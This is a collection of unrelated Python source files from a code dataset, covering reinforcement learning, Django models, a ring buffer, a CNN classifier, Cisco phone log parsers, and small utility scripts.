tf.name_scope(\"train\"):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n\n# Set up Tensorboard\nwriter = tf.summary.FileWriter(\"/tmp/tensorboard/pg/1\")\ntf.summary.scalar(\"Loss\", loss)\ntf.summary.scalar(\"Reward_mean\", mean_reward_)\nwrite_op = tf.summary.merge_all()\n\n\n# Train the agent\n# For each step:\n# choose an action a\n# perform action a\n# store s, a, r\n# if done:\n# calculate sum reward\n# calculate gamma Gt\n# optimize\nallRewards = []\ntotal_rewards = 0\nmaximumRewardRecorded = 0\nepisode = 0\nepisode_states, episode_actions, episode_rewards = [], [], []\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for episode in range(max_episodes):\n \n episode_rewards_sum = 0\n\n # Launch the game!\n state = env.reset()\n\n env.render()\n\n while True:\n\n # Choose action a\n action_probability_distribution = sess.run(action_distribution, feed_dict={input_: state.reshape([1,4])})\n\n action = np.random.choice(range(action_probability_distribution.shape[1]), p=action_probability_distribution.ravel())\n\n # Perform a\n new_state, reward, done, info = env.step(action)\n\n # Store s, a, r\n episode_states.append(state)\n\n action_ = np.zeros(action_size)\n action_[action] = 1\n\n episode_actions.append(action_)\n\n episode_rewards.append(reward)\n\n if done:\n # Calculate the sum reward\n episode_rewards_sum = np.sum(episode_rewards)\n\n allRewards.append(episode_rewards_sum)\n\n total_rewards = np.sum(allRewards)\n\n # Calculate the mean reward, as well\n mean_reward = np.divide(total_rewards, episode+1)\n\n maximumRewardRecorded = np.amax(allRewards)\n\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~\")\n print(\"Episode: \", episode)\n print(\"Reward: \", episode_rewards_sum)\n print(\"Mean Reward: \", mean_reward)\n print(\"Max reward so far: \", maximumRewardRecorded)\n\n # Calculate discounted reward\n discounted_episode_rewards = discount_and_normalize_rewards(episode_rewards)\n\n # Feedforward, gradient, and backpropagation\n loss_, _ = sess.run(\n [loss, train_opt],\n feed_dict={\n input_: np.vstack(np.array(episode_states)),\n actions: np.vstack(np.array(episode_actions)),\n discounted_episode_rewards_: discounted_episode_rewards\n }\n )\n\n # Write TF summaries\n summary = sess.run(\n write_op,\n feed_dict={\n input_: np.vstack(np.array(episode_states)),\n actions: np.vstack(np.array(episode_actions)),\n discounted_episode_rewards_: discounted_episode_rewards,\n mean_reward_: mean_reward\n }\n )\n\n writer.add_summary(summary, episode)\n writer.flush()\n\n # Reset the transition stores\n episode_states, episode_actions, episode_rewards = [], [], []\n\n break\n\n state = new_state\n","sub_path":"cartpole_main.py","file_name":"cartpole_main.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"32903586","text":"import networkx as nx\nimport random\n\n\ndef display_graph(graph, width):\n i = 0\n for node in graph.nodes(data=True):\n if i % width == 0:\n print ('\\n')\n print(node, end='\\t')\n i += 1\n\n\ndef generate_graph(height=5, width=5):\n graph = nx.grid_2d_graph(height, width, periodic=False, create_using=None)\n # set random values for all the nodes\n for _, data in graph.nodes(data=True):\n data[\"value\"] = random.randint(1, 20)\n\n return graph\n","sub_path":"local_search/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"219850394","text":"from django.db import models\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.contrib.auth.base_user import AbstractBaseUser\nfrom django.utils.translation import gettext as _\nfrom user.managers import UserManager\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n email = models.EmailField(_(\"email\"), unique=True)\n username = models.CharField(_(\"username\"), max_length=50, primary_key=True)\n data_joined = models.DateTimeField(_(\"data_joined\"), auto_now_add=True)\n is_active = models.BooleanField(_(\"is_active\"), default=True)\n is_staff = models.BooleanField(_(\"is_staff\"), default=True)\n\n objects = UserManager()\n USERNAME_FIELD = \"username\"\n REQUIRED_FIELDS = [\"email\", ]\n\n class Meta:\n verbose_name = _(\"username\")\n verbose_name_plural = _(\"usernames\")\n\n def get_name(self):\n return self.username.strip()\n","sub_path":"translate-me/authentication-master/api/user/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"518664602","text":"class RingBuffer:\n def __init__(self, capacity):\n self.capacity = capacity\n self.current = 0\n self.storage = [None]*capacity\n\n def append(self, item):\n # check if there is space in the storage\n if None in self.storage:\n # get the index of None\n emptyIndex = self.storage.index(None)\n self.storage[emptyIndex] = item\n # if storage is full\n else:\n # get the first element as the oldest\n oldestItem = self.storage[0]\n for i in self.storage:\n # getting the oldest element in the array\n if i < oldestItem:\n oldestItem = i\n # get the oldest item index\n oldestItemIndex = self.storage.index(oldestItem)\n # override item with the oldest\n self.storage[oldestItemIndex] = item\n\n def get(self):\n return [item for item in self.storage if item != None]\n","sub_path":"ring_buffer/ring_buffer.py","file_name":"ring_buffer.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"276483793","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport cv2\nimport matplotlib.pyplot as plt\nimport pickle\nimport numpy as np\n\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ndef get_data_and_label(file):\n dict = unpickle(file)\n data = dict[b'data']\n label = dict[b'labels']\n print(type(data))\n print(type(label))\n # data = data.reshape([-1,3,32,32])\n label = np.array(label,dtype = np.uint8)\n return data,label\n\ndef classification_model_fn(features,labels,mode):\n # Input data and label\n # Suppose the data format is NHWC\n input_data = tf.reshape(features[\"x\"],[-1,32,32,3])\n input_data = tf.cast(input_data,tf.float32)\n print(input_data.shape)\n labels = tf.cast(labels, tf.int32)\n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(inputs=input_data,\n filters = 32,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv1.shape)\n BN = tf.layers.batch_normalization(conv1)\n pool1 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2) \n # Convolutional Layer #2\n conv2 = tf.layers.conv2d(inputs=pool1,\n filters = 64,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv2.shape)\n BN = tf.layers.batch_normalization(conv2)\n pool2 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n # Convolutional Layer #3\n conv3 = tf.layers.conv2d(inputs=pool2,\n filters = 128,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv3.shape)\n BN = tf.layers.batch_normalization(conv3)\n # Convolutional Layer #4\n conv4 = tf.layers.conv2d(inputs=BN,\n filters = 64,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv4.shape)\n BN = tf.layers.batch_normalization(conv4)\n # Convolutional Layer #5\n conv5 = tf.layers.conv2d(inputs=BN,\n filters = 128,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv5.shape)\n BN = tf.layers.batch_normalization(conv5)\n pool3 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n\n # Convolutional Layer #6\n conv6 = tf.layers.conv2d(inputs=pool3,\n filters = 256,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv6.shape)\n BN = tf.layers.batch_normalization(conv6)\n # Convolutional Layer #7\n conv7 = tf.layers.conv2d(inputs=BN,\n filters = 128,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv7.shape)\n BN = tf.layers.batch_normalization(conv7)\n # Convolutional Layer #8\n conv8 = tf.layers.conv2d(inputs=BN,\n filters = 256,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv8.shape)\n BN = tf.layers.batch_normalization(conv8)\n pool4 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n\n # Convolutional Layer #9\n conv9 = tf.layers.conv2d(inputs=pool4,\n filters = 512,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv9.shape)\n BN = tf.layers.batch_normalization(conv9)\n # Convolutional Layer #10\n conv10 = tf.layers.conv2d(inputs=BN,\n filters = 256,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv10.shape)\n BN = tf.layers.batch_normalization(conv10)\n # Convolutional Layer #11\n conv11 = tf.layers.conv2d(inputs=BN,\n filters = 512,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv11.shape)\n BN = tf.layers.batch_normalization(conv11)\n # Convolutional Layer #12\n conv12 = tf.layers.conv2d(inputs=BN,\n filters = 256,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv12.shape)\n BN = tf.layers.batch_normalization(conv12)\n # Convolutional Layer #13\n conv13 = tf.layers.conv2d(inputs=pool4,\n filters = 512,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv13.shape)\n BN = tf.layers.batch_normalization(conv13)\n pool5 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n\n # Convolutional Layer #14\n conv14 = tf.layers.conv2d(inputs=pool5,\n filters = 1024,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv14.shape)\n BN = tf.layers.batch_normalization(conv14)\n # Convolutional Layer #15\n conv15 = tf.layers.conv2d(inputs=BN,\n filters = 512,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv15.shape)\n BN = tf.layers.batch_normalization(conv15)\n # Convolutional Layer #16\n conv16 = tf.layers.conv2d(inputs=BN,\n filters = 1024,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv16.shape)\n BN = tf.layers.batch_normalization(conv16)\n # Convolutional Layer #17\n conv17 = tf.layers.conv2d(inputs=BN,\n filters = 512,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv17.shape)\n BN = tf.layers.batch_normalization(conv17)\n # Convolutional Layer #18\n conv18 = tf.layers.conv2d(inputs=BN,\n filters = 1024,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv18.shape)\n BN = tf.layers.batch_normalization(conv18)\n \n # Convolutional Layer #19\n conv19 = tf.layers.conv2d(inputs=BN,\n filters = 1000,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv19.shape)\n\n avgpool = tf.layers.average_pooling2d(conv19,pool_size = [7,7],strides = 1)\n # Dense Layer\n avgpool_flat = tf.reshape(avgpool, [-1, 7 * 7 * 1000])\n dense = tf.layers.dense(inputs=avgpool_flat, units=1000, activation=tf.nn.softmax)\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits Layer\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\ndef main(unused_argv):\n # Load training and eval data\n # mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n file1 = \"cifar-10-batches-py/data_batch_1\"\n train_data,train_labels = get_data_and_label(file1)\n file2 = \"cifar-10-batches-py/data_batch_2\"\n eval_data,eval_labels = get_data_and_label(file2)\n # Create the Estimator\n yolo_classifier = tf.estimator.Estimator(\n model_fn=classification_model_fn, model_dir=\"tmp/yolo_convnet_model\")\n # Set up logging for predictions\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50)\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\":train_data},\n y=train_labels,\n batch_size=64,\n num_epochs=160,\n shuffle=True)\n yolo_classifier.train(\n input_fn=train_input_fn,\n steps=20000,\n hooks=[logging_hook])\n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\":eval_data},\n y=eval_labels,\n num_epochs=1,\n shuffle=False)\n eval_results = yolo_classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\n\nif __name__ == '__main__':\n # file = \"C:\\\\Users\\\\DengDazhen\\\\Desktop\\\\test\\\\cifar-10-batches-py\\\\data_batch_1\"\n # data,label = get_data_and_label(file)\n #transform the input array to a 32*32*3 matrix\n # data = data.reshape([-1,3,32,32])\n # dataset = tf.data.Dataset.from_tensor_slices({'image':data,'label':label})\n # iterator = dataset.make_one_shot_iterator()\n # one_element = iterator.get_next()\n # with tf.Session() as sess:\n # for i in range(5):\n # print(sess.run(one_element))\n tf.app.run()\n\n \n\n\n","sub_path":"YOLO_l.py","file_name":"YOLO_l.py","file_ext":"py","file_size_in_byte":9543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"401673668","text":"import re\n\nport_counters = [\n 'RxalignErr',\n 'RxcrcErr',\n 'RxlongErr',\n 'RxshortErr',\n 'RxtokenDrop',\n 'Txcollisions',\n 'TxexcessDefer',\n 'TxexcessLength',\n 'TxlateCollision',\n]\n\n# 78/88 debug display:\n# [8:54:12am 08/20/19] DeviceTLInfo ... ReasonForOutOfServiceText=...\n# 8821 has space after seconds\n# [5:48:09 AM 10/11/19] DeviceName=SEP007686CF681A ... ReasonForOutOfServiceText=...\ndebug_rgx_default = re.compile(\n r'\\d{1,2}:\\d{1,2}:\\d{1,2}\\s*\\w{2},?\\s*'\n r'(?P\\d{2}/\\d{2}/\\d{2}).+'\n r'ReasonForOutOfServiceText=(?P\\w+)',\n re.I,\n)\n\n# 79xx debug display (does not include date:\n# 12:02:55a 25: Name=SEPB8BEBF227D79 Load= 9.4(2SR3.1S) Last=Initialized\ndebug_rgx_79xx = re.compile(\n r'(?P\\d{1,2}:\\d{1,2}:\\d{1,2}\\w).+'\n r'Last=(?P.+)$',\n re.I,\n )\n\n# 78/88 status messages:\n# [8:52:30am 10/01/19] ITL installed\nstatus_rgx_default = re.compile(\n r'\\d{1,2}:\\d{1,2}:\\d{1,2}\\s*\\w{2},?\\s*'\n r'(?P\\d{2}/\\d{2}/\\d{2})\\]\\s*'\n r'(?P.+)',\n re.I,\n)\n\n# 79xx debug display (does not include date:\n# 1:33:26a TFTP Error : SEPB8BEBF9D2061.cnf.xml.sgn\nstatus_rgx_79xx = re.compile(\n r'(?P\\d{1,2}:\\d{1,2}:\\d{1,2}\\w)\\s*'\n r'(?P.+)$',\n re.I,\n )\n\ndebug_display_rgx = [debug_rgx_default, debug_rgx_79xx]\nstatus_messages_rgx = [status_rgx_default, status_rgx_79xx]\n\n\ndef multi_match(text_list, rgx_list, cnt):\n \"\"\"\n Collected lines that match regex's in the rgx_list until the # of collected\n lines equals cnt.\n\n Args:\n text_list (list): List of strings to match\n rgx_list (list): One or more regex's\n cnt (int): Number of matches to collect before returning\n\n Returns:\n (str): The matched lines joined by linefeed/CR\n \"\"\"\n matches = []\n for line in text_list:\n line = re.sub(r'\\n', ' ', line)\n for rgx in rgx_list:\n m = rgx.search(line)\n if m:\n matches.append(' '.join(m.groups()))\n break\n\n if len(matches) >= cnt:\n break\n return '\\n\\r'.join(matches)\n\n\ndef prep_xml(func):\n \n def wrapper(xml_dict, count=1):\n \"\"\"\n Take the OrderedDict returned from the Status message or Debug display web page\n and strip out the status messages for further processing.\n\n These pages both return the following data structures:\n If multiple messages exist:\n {'DeviceLog': { 'status' [ 'msg1', 'msg2']}}\n If a single (or no) message exists:\n {'DeviceLog': { 'status' 'msg'}}\n\n The value of the inner 'status' key is taken and, if necessary converted to a list. \n The list is then reversed so the most recent entries are first. \n\n Args:\n xml_dict (OrderedDict): Converted XML from IP phone web page\n count (int): Number of results to return \n \n Returns:\n status_messages (list): Reversed list of status message entries\n \"\"\"\n device_log = xml_dict.get('DeviceLog') or {}\n status_messages = device_log.get('status') or []\n\n # status_messages will be a list unless only one status message exists on the page\n # in which case it will be a string\n if isinstance(status_messages, str):\n status_messages = [status_messages]\n\n status_messages.reverse()\n return func(status_messages, count)\n return wrapper\n\n\n@prep_xml\ndef parse_status_error(status_messages, count):\n \"\"\"\n Parse Status message web page for the most recent error messages.\n\n Lines are matched based on the err_rgx.\n\n The most recent X matches are returned where X is the value of count.\n\n Args:\n status_messages (list): Lines from the Status message web page\n count (int): Number of matches to return\n\n Returns:\n (str): One or more matched lines joined by CR/LF\n \"\"\"\n err_rgx = re.compile(r'(no trust list|error|configmismatch|tftp timeout)', re.I)\n matched = []\n for msg in status_messages:\n if err_rgx.search(msg):\n matched.append(msg)\n\n return multi_match(matched, status_messages_rgx, count)\n\n\n@prep_xml\ndef parse_status_itl(status_messages, count):\n \"\"\"\n Parse Status message web page for the most recent ITL-related entries.\n\n Matched lines contain \"ITL\" or \"Trust\". These may be errors or informational.\n\n The most recent X matches are returned where X is the value of count.\n\n Args:\n status_messages (list): Lines from the Status message web page\n count (int): Number of matches to return\n\n Returns:\n (str): One or more matched lines joined by CR/LF\n \"\"\"\n itl_rgx = re.compile(r'(ITL|Trust)')\n matched = []\n for msg in status_messages:\n if itl_rgx.search(msg, re.I):\n matched.append(msg)\n\n return multi_match(matched, status_messages_rgx, count)\n\n\n@prep_xml\ndef parse_debug_reason(debug_messages, count=1):\n \"\"\"\n Parse Debug display page content for the most recent out of service reasons.\n\n Values are pulled from \"ReasonForOutOfServiceText=TEXT\" lines. The date and TEXT\n are extracted from the line and returned.\n\n The most recent X matches are returned where X is the value of count.\n\n Args:\n debug_messages (list): Lines from the Debug display web page\n count (int): Number of matches to return\n\n Returns:\n (str): One or more matched lines joined by CR/LF\n \"\"\"\n return multi_match(debug_messages, debug_display_rgx, count)\n\n\ndef parse_port_errors(port_dict):\n \"\"\"\n Parse PortInformation web pages and sum all the error counters into a single value.\n\n Args:\n port_dict (OrderedDict): Converted XML from IP phone web page\n\n Returns:\n val: (int): Sum of error counters\n \"\"\"\n port_info = port_dict.get('PortInformation') or {}\n val = 0\n for k in port_counters:\n try:\n val += int(port_info.get(k, 0))\n except (TypeError, KeyError):\n pass\n return val\n\n\ndef parse_pc_port_speed(port_dict):\n \"\"\"\n Parse Access network page content for PC port speed/duplex.\n\n Return 'N/A' if PortSpeed key is not present under the assumption that\n the source device does not have a PC port.\n\n Args:\n port_dict (OrderedDict): Converted XML from IP phone web page\n\n Returns:\n (str): PortSpeed value or 'N/A\n \"\"\"\n port_info = port_dict.get('PortInformation') or {}\n return port_info.get('PortSpeed', 'N/A')\n","sub_path":"field_funcs.py","file_name":"field_funcs.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"320103664","text":"import sys\nimport os\n\nimport numpy as np\nimport scipy.stats\n\n\ndef mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, h\n\n\ndef read_results(dataset):\n fn = '%s_result.txt' % dataset\n\n methods = ['phrase model score',\n 'marker model score',\n 'IR-based',\n 'AB method 0',\n 'AB method 1',\n 'AB method 2',\n 'AB method 3',\n 'Opine - marker, score',\n 'Opine - marker, running time',\n 'Opine - histogram, score',\n 'Opine - histogram, running time']\n scores = { method : [] for method in methods}\n for line in open(fn):\n line = line.strip()\n score_id = None\n for method in methods:\n if line.startswith(method):\n score_id = method\n break\n\n if score_id != None:\n token = ''\n if '\\t' in line:\n token = line.split('\\t')[-1]\n elif ' ' in line:\n token = line.split(' ')[-1]\n scores[method].append(float(token))\n\n # table 1\n columns = []\n for difficulty in range(3):\n column = []\n N = len(scores['IR-based'])\n\n ir_based = [scores['IR-based'][i] for i in range(N) if i % 3 == difficulty]\n column.append(mean_confidence_interval(ir_based))\n for ab_mode in range(4):\n attr_name = 'AB method %d' % ab_mode\n score = [scores[attr_name][i] for i in range(N) if i % 3 == difficulty]\n column.append(mean_confidence_interval(score))\n opine = [scores['Opine - marker, score'][i] \\\n for i in range(N) if i % 3 == difficulty]\n column.append(mean_confidence_interval(opine))\n columns.append(column)\n\n print('Table 1 dataset %s' % dataset)\n max_conf_int = 0.0\n for i in range(6):\n row = '\\t'.join(['%.3f' % columns[j][i][0] for j in range(3)])\n max_conf_int = max(max_conf_int, max([columns[j][i][1] for j in range(3)]))\n print(row)\n print('max_conf_int =', max_conf_int)\n\n # table 2\n column = []\n LR_accuracy = mean_confidence_interval(scores['marker model score'])\n NDCG_10 = mean_confidence_interval(scores['Opine - marker, score'])\n runtime1 = mean_confidence_interval(scores['Opine - marker, running time'])\n column += [LR_accuracy, NDCG_10, runtime1]\n LR_accuracy = mean_confidence_interval(scores['phrase model score'])\n NDCG_10 = mean_confidence_interval(scores['Opine - histogram, score'])\n runtime2 = mean_confidence_interval(scores['Opine - histogram, running time'])\n column += [LR_accuracy, NDCG_10, runtime2]\n speedup = [b / a for (a, b) in zip(scores['Opine - marker, running time'],\n scores['Opine - histogram, running time'])]\n column.append(mean_confidence_interval(speedup))\n\n print('Table 2 dataset %s' % dataset)\n for i in range(7):\n print('%.2f %.3f' % (column[i][0], column[i][1]))\n print('avg. runtime - marker =', np.mean(scores['Opine - marker, running time']) / 100)\n print('avg. runtime - histogram =', np.mean(scores['Opine - histogram, running time']) / 100)\n\n\nif __name__ == '__main__':\n datasets = ['london', 'amsterdam', 'toronto_lp', 'toronto_jp']\n\n for dataset in datasets:\n read_results(dataset)\n","sub_path":"eval/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"182734005","text":"#ID25.py\n\n#This program finds the first fibonacci number with 1000 digits\n\ndef ID25():\n numdig = int(input('What is the number of digits? '))\n x = 1\n a = 0\n b = 0\n length = 0\n fibnum = 1\n while length < numdig:\n b = x\n x += a\n a = b\n tlength = len(str(x))\n if tlength > length:\n length = tlength\n fibnum += 1\n print('The number is ', fibnum)\n\nID25()\n","sub_path":"python files/id25.py","file_name":"id25.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"34562143","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.e_introduction, name='e_introduction'),\n path('introduction/edit//', views.introduction_edit, name='e_introduction_edit'),\n path('teams//', views.e_teams, name='e_teams'),\n path('subcategory//', views.e_subcategory, name='e_subcategory'),\n path('services//', views.e_services, name='e_services'),\n]","sub_path":"kilwoo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"543442737","text":"\nlista_cosas = [\"das\", 123, 456, \"fsdskhg\", 796, \"36464230a\", \"sfsd\", 723746245]\nlista_numeros = []\nlista_str = []\n\n\n\nfor dato in lista_cosas:\n if type(dato) == str:\n lista_str.append(dato)\n elif type(dato) == int:\n lista_numeros.append(dato)\n\n\nprint(lista_str)\nprint(lista_numeros)\n","sub_path":"ejercicios/lista_con_str_int.py","file_name":"lista_con_str_int.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"37201272","text":"from keras.models import Model,Sequential\nfrom keras.layers import Embedding,LSTM,Dense,Average,Input\n#from gensim.models import KeyedVectors\n\n#word_vectors = KeyedVectors.load_word2vec_format('./embeddings/low_shuff_combine_tokenized.txt-iter17-min5.bin', binary=True)\n\nmodel_input = Input(shape=(None,))\nfixed = word_vectors.get_keras_embedding(train_embeddings=False)(model_input)\nfree = word_vectors.get_keras_embedding(train_embeddings=True)(model_input)\ncombined = Average()([free,fixed])\n\nlstm = LSTM(args.value,\n activation='tanh', # activation function used\n recurrent_activation='hard_sigmoid', # activation function for recurrent step\n use_bias=True, # whether the layer uses a bias vector\n kernel_initializer='glorot_uniform', # initialiser for the weights matrix\n recurrent_initializer='orthogonal', # initialiser for the recurrent kernal's weights\n bias_initializer='zeros', # initialiser for the bias vector\n unit_forget_bias=True, # add 1 to the bias of the forget gate at initialization\n kernel_regularizer=None, # regularizer function applied to kernal\n recurrent_regularizer=None, # regularizer function applied to recurrent kernal\n bias_regularizer=None, # regularizer function applied to bias vector\n activity_regularizer=None, # regularizer function applied to output of the layer\n kernel_constraint=None, # constraint function applied to the kernal\n recurrent_constraint=None, # constraint function applied to the recurrent kernal\n bias_constraint=None, # constraint function applied to the bias vector\n dropout=0.0, # fraction of units to drop for the linear transformation of the inputs\n recurrent_dropout=0.0, # fraction of units to drop for the linear transformation of the recurrent state\n implementation=1, # implementation mode, either 1 or 2.\n return_sequences=False,\n return_state=False,\n go_backwards=False,\n stateful=False, # If True, the last state for each sample at index i in a batch will be used as initial state for the sample of index i in the following batch.\n unroll=False)(combined)\noutput = Dense(2,\n activation='softmax',\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None)(lstm)\n\nmodel = Model(inputs=[model_input], outputs=[output])\n\nmodel.compile(optimizer='Adadelta',\n loss='binary_crossentropy',\n metrics=['acc'],\n sample_weight_mode=None,\n weighted_metrics=None,\n target_tensors=None)\n\n#from keras.utils import plot_model\n#plot_model(model,show_shapes=True, show_layer_names=False, to_file='model2.png')\n","sub_path":"models/lstm_single_embedDual.py","file_name":"lstm_single_embedDual.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"653298701","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport os\nimport peewee\nfrom playhouse.shortcuts import model_to_dict\n\n\ndatabase_path = '/home/rrocha/projects/feagri/ebbandflow.db'\ndatabase = peewee.SqliteDatabase(database_path)\n\n\nclass BaseModel(peewee.Model):\n class Meta:\n database = database\n\n def to_dict(self, datefield_format='%d/%m/%Y'):\n dict_model = model_to_dict(self)\n\n for key, value in dict_model.items():\n if isinstance(value, datetime.date):\n new_value = value.strftime(datefield_format)\n dict_model[key] = new_value\n\n return dict_model\n\n\nclass StatusPlanta(BaseModel): \n status_bomba = peewee.CharField()\n modo_operacao = peewee.CharField()\n umidade_set_point = peewee.CharField()\n intervalo_leitura = peewee.CharField()\n umidade_substrato = peewee.CharField()\n ph_solucao = peewee.CharField()\n ph_set_point = peewee.CharField()\n created_date = peewee.DateTimeField(default=datetime.datetime.now)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"533190466","text":"import datetime\r\nbefore1 = input(\"開始日(YYYY/MM/DD) :\")\r\nafter1 = datetime.datetime.strptime(before1, '%Y/%m/%d')\r\nbefore2 = input(\"終了日(YYYY/MM/DD) :\")\r\nafter2 = datetime.datetime.strptime(before2, '%Y/%m/%d')\r\n\r\n\r\nout = after2-after1\r\nprint(\"日数差: {0} 日\".format(out.days))\r\n\r\n","sub_path":"python実験/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"411050607","text":"def hth_anno():\n f=open(\"./data/domian_in_neighbour.tbl\").read().split(\"\\n\")\n f=f[3:-11]\n query2accession={}\n for i in f:\n i_info=i.split()\n query=i_info[2]\n accession=i_info[1]\n if query not in query2accession.keys():\n query2accession[query]=[accession]\n else:\n query2accession[query].append(accession)\n geneWithHth=list(query2accession.keys())\n \n #f=open(\"./data/del\").read().split(\"\\n\")\n f=open(\"./data/neighbour.log_1\").read().split(\"\\n\")\n f.remove(\"\")\n target2neighbour={}\n t2n={}\n for i in f:\n i_info=i.split(\":\")\n key=i_info[0]\n value=eval(i_info[1])\n tmp=[]\n for j in value:\n if j in geneWithHth:\n j_strand=\"dsadasdsa\"\n tmp.append(j_strand)\n if tmp:\n target2neighbour[key]=\"1\"\n t2n[key]=tmp\n else:\n target2neighbour[key]=\"0\"\n t2n[key]=[]\n return target2neighbour, 